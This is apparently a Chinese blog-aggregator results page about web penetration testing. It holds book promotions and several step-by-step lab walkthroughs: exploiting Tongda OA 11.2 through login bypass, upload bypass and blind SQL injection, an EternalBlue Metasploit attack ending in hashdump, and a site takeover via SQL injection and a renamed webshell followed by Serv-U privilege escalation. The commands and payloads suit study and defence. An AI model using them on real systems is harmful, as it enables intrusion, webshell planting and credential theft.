精华内容
下载资源
问答
  • web渗透实例

    2012-12-08 09:37:48
    一次艰难的渗透纪实,不容错过,真实web入侵纪实!
  • Web渗透技术及实战案例解析》从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程。《Web渗透技术及实战案例解析》共分7章,由浅入深地介绍和分析了目前网络流行的Web渗透攻击方法和...
  • Web渗透技术及实战案例解析》是2012年电子工业出版社出版的图书,作者是陈小兵、范渊、孙立伟。本书从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程。
  • Web渗透技术及实战案例解析第2版》从Web渗透的专业角度,结合网络攻防中的实际案例,图文并茂地再现了Web渗透的精彩过程。本书还精选经典案例,搭建测试环境,供读者进行测试。本书较第1版更加系统、科学地介绍了...
  • Web渗透技术及实战案例解析》,网络安全学习必备,信息安全类书籍
  • 安全之路:Web渗透技术及实战案例解析(第2版)安全之路:Web渗透技术及实战案例解析(第2版)安全之路:Web渗透技术及实战案例解析(第2版)
  • 以通达OA系统11.2版本为案例Web渗透 1. 渗透背景: 目标站点:VM虚拟机 O A 版本:通达OA系统11.2 目标系统:Windows server 2008 R2 SP1 威胁等级:高危 渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User...

    1. 渗透背景:

    目标站点:VM虚拟机
    O A 版本:通达OA系统11.2
    目标系统:Windows server 2008 R2 SP1
    威胁等级:高危
    渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User、PHPstorm、蚁剑、VMware

    2. 存在漏洞

    1. 前台任意用户登录漏洞
    2. 前台未授权访问漏洞
    3. 管理后台文件上传漏洞
    4. 后台SQL注入漏洞
    5. 文件包含getshell

    3. 漏洞复现

    3.1 前台任意用户登录漏洞

    3.1.1 漏洞原理:

    根据网友提供的POC的代码分析,该漏洞涉及的文件包含以下四个文件:

    /ispirit/login_code.php/ispirit/login_code_check.php/general/login_code_scan.php/general/index.php

    通达OA源码使用zend5加密,利用解密工具SeayDzend解密上述四个文件后分析源码。

    1. /ispirit/login_code.php
      在这里插入图片描述
      该文件用来获取codeuid 参数,如果不存在,则会自动生成一个codeuid ,并且将其写入CODE_LOGIN_PC缓存中(通达OA使用了缓存系统Redis,同时也提供了对缓存的使用方法),但是在18行位置将这个参数显示出来,导致用户可以获取这个参数的值,从而可以绕过后面的验证。

    2. /general/login_code_scan.php
      在这里插入图片描述
      在这一文件中,用户可以控制输入的关键参数uid,在存在漏洞的通达OA版本中,后台数据库里uid对应的用户是admin管理员账户。并且将该数据存储在CODE_INFO_PC 缓存中,因为我们在第一个文件中获取的codeuid存储在CODE_LOGIN_PC中,所以这里在复现时需要指明source变量为pc,这里的username则为admin,而type变量需要指明为confirm

    3. /ispirit/login_code_check.php
      在这里插入图片描述
      这里使用之前存储的两个缓存中的内容,一个用来获取codeuid,一个用来获取通过Post 传入的uid等关键信息。
      在这里插入图片描述
      这里是最为关键的位置,代码获取用户可控的参数uid,并依次作为依据直接带入数据库进行查询。
      在这里插入图片描述
      在这里插入图片描述
      随后将查询的信息直接写入session中,通过这一步, session中包含的就是管理员的身份信息。

    3.1.2 手工抓包复现:

    1. 抓首页的包进行更改,访问/ispirit/login_code.php,通过返回包获取codeuid
      在这里插入图片描述

    2. 使用POST方式访问/general/login_code_scan.php,提交相关参数,其中codeuid改为上一步中返回的值。

      payload:

      uid=1&codeuid={your-codeuid}&type=confirm&source=pc&username=admin
      

      在这里插入图片描述

    3. 使用GET方式访问/ispirit/login_code_check.php,传入关键参数codeuid,让后台进行代入查询,并返回携带管理员身份信息的凭证。
      在这里插入图片描述

    4. 经过这步后客户端已经拥有了管理员的身份信息,直接访问OA主页,放行如下数据包以及后续的数据包(后续数据包内容大概为管理页面的其他内容),成功以管理员身份登录OA系统。
      在这里插入图片描述
      在这里插入图片描述

    3.1.3 POC自动获取复现:

    1. 在python环境下运行POC,返回cookie
      (POC来自Github:https://github.com/NS-Sp4ce/TongDaOA-Fake-User
      在这里插入图片描述

    2. 替换浏览器存储的cookie,访问http://your-ip/general/成功以管理员身份登录OA系统。
       
      未更改cookie前:
      在这里插入图片描述
      更改cookie后:
      在这里插入图片描述

    3.2 前台未授权访问漏洞

    备注:需要后台有账户在线时使用
     

    1. 访问http://your-ip/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 ,此时出现RELOGIN,说明目前没有人在线,需要等待有人登录的时候再尝试。
      在这里插入图片描述
    2. 在虚拟机通达后台登录管理员账号,再次尝试,此时出现空白页面,说明已经获得权限。
      在这里插入图片描述
    3. 再次访问http://your-ip/general/,成功进入系统。
      在这里插入图片描述

    3.3 管理后台文件上传漏洞

    1. 登录后台后,在“系统管理 → 系统参数设置 → OA服务设置”,找到Webroot目录
      在这里插入图片描述

    2. 点击系统管理 → 附件管理 → 添加存储目录,在此重新设置上传附件存储目录(原先默认的路径在MYOA -> attach,不在网站目录MYOA -> webroot下)

      注:
      此处的更改上传文件路径选项在通达OA11.2的版本下可以,11.4版本中不能如此设置,因为这个路径被识别为敏感路径。
      在这里插入图片描述

    3. 选择组织 → 管理员 → 附件上传,经测试,此处上传“php、php5、phtml”等后缀会被过滤,此时上传TXT 文件是成功的。抓包查看返回值。
      在这里插入图片描述
      在这里插入图片描述

    4. 根据返回的结果,拼接文件路径, http://your-ip/im/2106/704995893.shell.txt
      在虚拟机中查看该目录,上传成功
      在这里插入图片描述

    5. 利用windows系统会自动去掉符号“点”,上传shell.php. 文件进行绕过
      在这里插入图片描述

    6. 根据返回的结果,拼接文件路径:http://your-ip/im/2106/shell.php,蚁剑连接,成功getshell
      在这里插入图片描述

    3.4 后台SQL注入漏洞

    备注:复现此漏洞需先通过上述操作登录OA管理后台,此时为admin权限但无数据库操作权限,此时存在SQL注入漏洞。

    1. 此漏洞存在于/general/appbuilder/web/calendar/calendarlist/getcallist 目录,该点存在盲注。(sqlmap未复现成功)
      问题关键参数: starttime=12&endtime=15&view=month&condition=1
       
      payload:

      starttime=12&endtime=15&view=month&condition=1
      starttime=AND (SELECT[RANDNUM]FROM(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
      
    2. Request包

      POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
      Host: your-ip
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) 			Gecko/20100101 Firefox/89.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Cookie: KEY_RANDOMDATA=1408; PHPSESSID=94jsta5nnj7ops79s11ji3v3s6
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 197
      
      starttime=12&endtime=15&view=month&condition=1
      starttime=AND (SELECT[RANDNUM]FROM(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
      

      爆出部分信息:
      在这里插入图片描述
      在这里插入图片描述

    3.5 文件包含getshell

    1. Goby扫描目标站点,爆出通达文件包含getshell,进行验证,goby自动完成Webshell上传。
      在这里插入图片描述
    2. 蚁剑连接shell成功验证。
      在这里插入图片描述
      在这里插入图片描述

    4. 总结

    针对本次实验复现的通达OA漏洞,解决方法为:尽快更新OA版本,及时打系统补丁。不过除了11.2版本外,此漏洞可能存在于其他版本中,可能也许只是漏洞代码的存放路径改变了,大神可自行分析(小弟我太白,现在真不会审计🤡)。后续版本也有许多其他问题,可能存在多版本也可能只有当前版本,等我有时间的时候再做做看吧(主要现在有些懒😢)

    本次实验复现了通达OA其中一个版本的漏洞,目的仅是用于学习渗透测试的思路以及部分方法。实验环境完全由自己搭建在虚拟机环境下,自己搭建自己复现,没有任何现实中的操作!

    (敲黑板!!!)
    此篇仅供技术交流学习,请勿用于任何现实网络环境的破坏!做一个遵纪守法的好公民!

    展开全文
  • 文章目录开启MSF攻击开始使用Auxiliary辅助模块嗅探目标选择和设置攻击模块运行攻击脚本拿下服务器后的工作关闭靶机防火墙拿到shell权限 开启MSF 开启数据库: service postgresql start 初始化msf数据库(第一次...

    开启MSF

    开启数据库:

    service postgresql start

    初始化msf数据库(第一次使用msf需要):

    msfdb init

    在这里插入图片描述

    开启MSF:

    msfconsole

    在这里插入图片描述
    查看数据连接状态:

    db_status

    在这里插入图片描述

    使用Auxiliary模块测试目标

    选择模块(检验是否存在永恒之蓝漏洞的模块):

    use auxiliary/scanner/smb/smb_ms_17_010

    在这里插入图片描述
    设置目标主机并开始测试:

    set rhost 192.168.83.156
    run

    在这里插入图片描述
    绿色+表示有可能出现漏洞

    使用exploit模块进行永恒之蓝攻击

    我们选择永恒之蓝模块进行攻击,并设置目标的ip

    use exploit/windows/smb/ms17_010_eternalblue
    set rhosts 192.168.83.156(靶机ip)

    在这里插入图片描述

    设置payload

    查看可用payload

    show payloads

    我们选择反向连接reverse
    在这里插入图片描述
    设置反向连接payload和本机地址,就是让目标主机主动连接攻击机。

    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.83.154(本机ip)

    在这里插入图片描述

    开始攻击

    输入run进行攻击

    run

    在这里插入图片描述
    成功拿下主机。
    检测到攻击,靶机会在一分钟后重启,我们需要关闭靶机的防火墙,再次攻击。

    拿到shell权限

    输入shell拿到shell权限

    shell

    在这里插入图片描述
    如有乱码,请更改Kali机的终端编码格式。
    拿到了shell权限,我们就可以进行更多操作,比如查看系统用户
    在这里插入图片描述
    system权限下可用hashdump来获取用户的hash密码
    在这里插入图片描述

    展开全文
  • Web渗透技术及实战案例解析 PDF 分享

    千次阅读 2019-07-14 15:20:31
             提取码:b9p1 ...WEB之困-现代WEB应用安全指南 黑客攻防技术宝典:系统实战篇(第2版) Android安全攻防权威指南 Python灰帽子 黑客与逆向工程师的P...

    链接:https://pan.baidu.com/s/1XsI2AemiPZH0UqFRfQZIjw           提取码:b9p1

    相关推荐
    WEB之困-现代WEB应用安全指南
    黑客攻防技术宝典:系统实战篇(第2版)
    Android安全攻防权威指南
    Python灰帽子 黑客与逆向工程师的Python编程之道
    代码审计:企业级Web代码安全架构

    在这里插入图片描述

    《Web渗透技术及实战案例解析》是2012年电子工业出版社出版的图书,作者是陈小兵、范渊、孙立伟。本书从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程。

    《Web渗透技术及实战案例解析》从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程。《Web渗透技术及实战案例解析》共分7章,由浅入深地介绍和分析了目前网络流行的Web渗透攻击方法和手段,并结合作者多年的网络安全实践经验给出了相对应的安全防范措施,对一些经典案例还给出了经验总结和技巧,通过阅读《Web渗透技术及实战案例解析》可以快速掌握目前Web渗透的主流技术。《Web渗透技术及实战案例解析》最大的特色就是实用和实战性强,思维灵活。内容主要包括Web渗透必备技术、Google黑客技术、文件上传渗透技术、SQL注入、高级渗透技术、0day攻击和Windows提权与安全防范等。
    《Web渗透技术及实战案例解析》内容丰富包括Web渗透必备技术,Google黑客技术,文件上传渗透技术,SOL注入,高级渗透技术,Oday攻防,Windows提权与安全防范等。

    内容简介
    本书共分7章,由浅入深地介绍和分析了目前网络流行的Web渗透攻击方法和手段,并结合作者多年的网络安全实践经验给出了相对应的安全防范措施,对一些经典案例还给出了经验总结和技巧,通过阅读本书可以快速掌握目前Web渗透的主流技术。本书最大的特色就是实用和实战性强,思维灵活。内容主要包括Web渗透必备技术、Google黑客技术、文件上传渗透技术、SQL注入、高级渗透技术、0day攻击和Windows提权与安全防范等。
    前言
    经过近一年时间的艰辛苦战,终于将本书完成。本书是我写的第三本书,主要从Web渗透的专业角度来讨论网络安全的攻防技术,尽可能地再现Web渗透场景,每一个小节都代表某一个场景,此书是我工作数年的总结,最后终于不辱使命将所有成果放在本书中与大家分享。
    本书是在我上一本书《黑客攻防及实战案例解析》基础上的又一本安全类书籍,主要讨论Web渗透攻防技术。攻击与防护是辩证统一的关系,掌握了攻击技术,也就掌握了防护技术。Web渗透是网络安全攻防的最热门技术,通过渗透Web服务器,利用已有信息,逐渐深入公司或者大型网络,最终完成渗透目标。
    最近二年来网络安全特别火爆,可以说从事网络安全还是蛮有前途的职业之一。目前网络安全界非常缺人,特别是在2011年CSDN、天涯等大型网站用户数据库泄露后,各大公司对安全人士求贤若渴,掌握网络安全攻防技术,拥有丰富经验的从业人员,年薪一般在10万以上,能够独立挖掘漏洞的从业人员年薪一般在20万以上。其实Web安全渗透技术也不是那么高不可攀,只要自己锁定这个方向,持之以恒,不断地进行试验和研究,终将成为一名高手,而且安全攻防技术还跟学历无关,很多技术高手都没有上过大学。
    Web渗透攻防技术可以通过以下方法来自学,一是通过安全站点漏洞更新通告、安全文章,了解漏洞的形成原理和利用过程,掌握漏洞的核心原理;二是在本地搭建试验环境进行实际测试,掌握漏洞利用方法;三是在互联网上对存在漏洞的站点进行实际操作,在真实环境下进行验证,提出修补漏洞的方法。在技术研究的同时还要做好记录,总结失败和成功的方法,积累技巧和经验,我曾经看过一位牛人,Web漏洞收集超过10GB数据!
    本书以Web渗透攻击与防御为主线,主要通过典型的渗透实际案例来介绍Web渗透和防御技术,在每一个小节中除了技术原理外,还对这些技术进行总结和提炼,掌握和理解这些技术后,读者在遇到类似的渗透场景时可以自己去进行渗透。本书采用最为通俗易懂的图文解说,按照书中的步骤即可还原当时的攻防情景。通过阅读本书,初学者可以很快掌握Web攻防的流程、最新的一些技术和方法,有经验的读者可以在技术上更上一层楼,使攻防技术从理论和实践中更加系统化,同时可以使用本书中介绍的一些防御方法来加固服务器系统。
    本书共分为7章,由浅入深,依照Web攻防的一些技术特点安排内容,每一小节都是一个具体Web攻防技术的典型应用,同时结合案例给予讲解,并给出一些经典的总结。本书主要内容安排如下。
    第1章 Web渗透必备技术
    介绍Web渗透的一些必备的基本知识,创建和使用VPN隐藏自己,获取操作系统密码、破解MD5密码、破解MySQL密码、数据库还原等,这些技术可以在Web渗透中使用,也可以在网络管理中使用。
    第2章 Google——我爱你又恨你
    利用Google等搜索引擎技术来获取信息,辅助Web渗透,在某些场景中往往会起到意想不到的效果,也被称为Nday攻击(0day后的数天持续攻击)。在进行Web攻防技术研究的同时,可以通过Google来进行实际演练,最好的效果就是网上爆出漏洞后利用Goolge技术来抓肉鸡。
    第3章 都是上传惹的祸
    上传是Web渗透中最容易获得WebShell的捷径之一,在本章中介绍了如何利用WebEditor、FCKeditor、CuteEditor等典型编辑器漏洞来获取WebShell的方法,同时还对登录绕过后通过Flash上传、文件上传等方法来获取WebShell进行探讨。
    第4章 SQL注入——渗透主乐章
    SQL注入是Web渗透的核心技术,本章主要介绍使用SQL注入方法获取WebShell,穿插介绍使用多种扫描软件、攻击工具来渗透Web服务器并提权。
    第5章 高级渗透技术
    本章介绍如何充分利用多种技术组合,结合巧妙的思路,最终成功渗透一些高难度的Web服务器。
    第6章 0day攻击
    0day是Web渗透中的“神器”,几乎是无往不胜,所向披靡,本章介绍利用Discuz!6.0、Discuz!7.2、Discuz!NT、PHP168、WordPress、Citrix、Art2008cms、Phpcms2008sp4等0day渗透Web服务器的一些方法。
    第7章 Windows提权与安全防范
    获取WebShell后,获得服务器权限一直是Web渗透的终极目标,本章对主流的一些提权方法进行介绍,掌握这些方法和原理后,可以举一反三,触类旁通。最后还对如何设置一个安全“变态”的Web服务器进行介绍。
    虽然本书内容已经很丰富与完整,但仍然无法涵盖所有的Web渗透的技术,但通过本书的学习,可以快速了解和掌握Web渗透技术,加固自己的服务器。本书的目的是通过Web渗透技术并结合一些案例来探讨网络安全,更好地加固Web服务器、远离黑客的威胁。

    目录
    第1章 Web渗透必备技术
    第2章 Google ——爱你又恨你
    第3章 都是文件上传惹的祸
    第4章 SQL注入——渗透主乐章
    第5章 高级渗透技术
    第6章 0day攻击
    第7章 Windows提权与安全防范

    展开全文
  • Web完整渗透测试实例

    千次阅读 2019-07-08 09:43:23
    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限; (2)学习渗透测试完整...

    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。

    目的:
    (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限;
    (2)学习渗透测试完整过程
    原理:
    黑客通过挖掘网站的注入漏洞,进而获得管理员账号密码进去后台,通过数据库备份,拿到webshell;然后黑客登录shell,通过2003服务器的提权exp拿下服务器的权限。

    1.检测网站安全性

    进入测试网站http://192.168.1.3界面
    在这里插入图片描述
    寻找漏洞,我们先用软件扫描,然后找到链接来测试,在浏览器打开http://192.168.1.3/see.asp?ID=461&titleID=86这个链接
    在这里插入图片描述
    在链接后面加 ‘ ,页面报错
    在这里插入图片描述
    由上图可知直接提示数据库错误界面,判断可能存在注入漏洞。我们在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=1
    在这里插入图片描述
    我们再在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=2
    在这里插入图片描述
    返回错误页面,在链接尾部输入and 1=1 和and 1=2返页面不同,由此我们判断这个站点存在SQL注入漏洞。

    2.使用工具破解管理员用户、密码

    打开啊D注入工具
    在这里插入图片描述
    把存在注入点的URL复制到啊D注入工具中,选择左侧的SQL注入检测,点击检测,在数据库的下方会提示我们数据库的类型等内容
    在这里插入图片描述
    点击检测表段,就是检测数据库所有表名
    在这里插入图片描述
    我们点击admin表,然后点检测字段
    在这里插入图片描述
    选择password和admin字段,再点击检测内容,暴出字段内容即破解用户名和密码
    在这里插入图片描述
    3.使用工具破解MD5密码

    我们得到的密码是用MD5加密的,我们通过MD5破解软件进行破解
    在这里插入图片描述
    由此,我们得到网站管理员的账号密码为linhai 123456
    4.登录网站管理后台

    我们用软件来探测网站管理后台,打开御剑后台扫描工具
    在这里插入图片描述
    把网站URL http://192.168.1.3输入工具中,点击开始扫描
    在这里插入图片描述
    通过扫描结果,我们猜测后台登录URL为http://192.168.1.3/admin/Login.asp
    在这里插入图片描述
    用破解的管理员账号linhai和密码123456成功登录后台
    在这里插入图片描述
    5.拿到网站webshell

    我们进入到网站管理后台,我们需要拿到webshell,本例中先打开系统管理,选择文章管理,打开上传图

    在这里插入图片描述
    我们直接上传asp木马试试
    在这里插入图片描述
    在这里插入图片描述
    我们把木马后缀名改为mm.jpg
    在这里插入图片描述
    在这里插入图片描述
    上传成功后,右键照片属性,看下它上传的位置记录下来,http://192.168.1.3/admin/Upfiles/201873091139.jpg
    在这里插入图片描述
    我们上传成功后,因为上传的是图片,不能解析成木马脚本,正好我们这个网站有备份数据库功能,我们可以通过数据备份的方式,重新命名脚本文件,使其能够作为木马脚本被执行。我们点击左侧的数据管理,选择备份/恢复数据库
    在这里插入图片描述
    在备份数据库中,数据库路径后面,填上我们刚刚上传图片的地址:…/admin/Upfiles/201873091139.jpg;在备份的数据库路径后面填写…/db/1.aspx。这样做的目的是把我们上传的jpg后缀的木马,重新备份成aspx文件,使我们的木马能够正常运行。
    在这里插入图片描述
    我们点击备份后,访问http://192.168.1.3/db/1.aspx就是我们的木马地址了,木马的密码是77169,至此,我们就拿到了这个网站的webshell
    在这里插入图片描述
    在这里插入图片描述
    6.拿到服务器权限

    进入webshell后,我们需要执行dos命令来添加管理员。点击webshell上端的命令行,进入执行命令模式
    在这里插入图片描述
    尝试执行whoami命令,查看下我们是什么权限

    在这里插入图片描述
    我们发现回显的是network service权限,在此权限下是不能直接添加管理员账户的,我们添加账户时,回显是空白,证明我们无法添加用户
    在这里插入图片描述
    点击端口扫描,再点击扫描,发现系统开放着43958端口,即server-u服务

    在这里插入图片描述
    点击SU提权,在cmdshell中输入命令net user aaa 123456 /add,然后点击执行
    在这里插入图片描述
    在cmdshell中输入命令net localgroup administrators aaa /add,然后点击执行
    在这里插入图片描述
    在cmdshell中输入命令net user,然后点击执行,查看aaa用户是否添加成功
    在这里插入图片描述
    在cmdshell中输入命令net user aaa,然后点击执行,查看aaa用户属于administrators用户组
    在这里插入图片描述
    点击开始->运行->mstsc->192.168.1.3->输入账号aaa和密码123456,点击登录
    在这里插入图片描述

    有疑问请加QQ群:894922931 咨询
    文章转载 侵权立删

    展开全文
  • 本书从Web渗透的专业角度,结合网络安全中的实际案例,图文并茂地再现Web渗透的精彩过程。本书共分7章,由浅入深地介绍和分析了目前网络流行的Web渗透攻击方法和手段,并结合作者多年的网络安全实践经验给出了相对应...
  • 本书是《Web渗透技术及实战案例解析》的第2版,与第1版相比,不仅增加了对“心脏出血”等近年来新出现的漏洞的分析,还对目前常见的Web漏洞、SQL注入漏洞、文件上传漏洞、Windows和Linux提权等攻击方式进行了剖析,...
  • 安全之路:Web渗透技术及实战案例解析(第2版) 中文版
  • Web渗透技术及实战案例解析
  • web渗透测试实战过程(详细)

    千次阅读 多人点赞 2019-08-24 14:52:31
    看过freebuf上的两篇渗透实战文章,总结一下全过程,传送门如下: 全程带阻:记一次授权网络攻防演练(上) 全程带阻:记一次授权网络攻防演练(下) 测试过程全部过程导图: 渗透过程问题处理思路: 登录功能的...
  • 安全之路:Web渗透技术及实战案例解析(第2版) 转载于:https://www.cnblogs.com/ITniu/p/6472437.html
  • 华为web白盒渗透测试指南,讲解白盒渗透测试的流程、策略、工具、方法、业务场景安全测试方法、白盒渗透测试经典案例
  • 本实战案例仅作为技术分享,切勿在未经许可的任何公网站点实战。 ‘’‘ 昨天有个朋友问我能不能拿一个学校的站。 我说学校的一般做的挺好的,都是外包,加了waf,安全狗,360之类的。 他坚持让我试试,他说卡了很久...
  • 本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线...
  • 小白入坑 Web 渗透测试必备指南

    万次阅读 多人点赞 2017-11-13 00:00:00
    渗透测试入坑必备指南」,「阅读原文」查看交流实录 「文末高能」 编辑 | 黑石 小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我。再者,内容不会完全讲...
  • web渗透测试基础入门 互联网公司安全攻防专家,世界五百强央企高级安全工程师...
  • Case 1: 从Web漏洞到资产下 载 ...安全专家于波带来的《基于云资产的渗透测试实例分享》,通过四个案例和一些小技巧,case by case 学习,给观众们带来步骤详细清晰的的实战经验,手把手解析,打开渗透测试的新思路。
  • Web完整渗透测试实例(windows)

    千次阅读 2019-07-22 12:10:35
    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限; (2)学习渗透测试完整...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 5,055
精华内容 2,022
关键字:

web渗透案例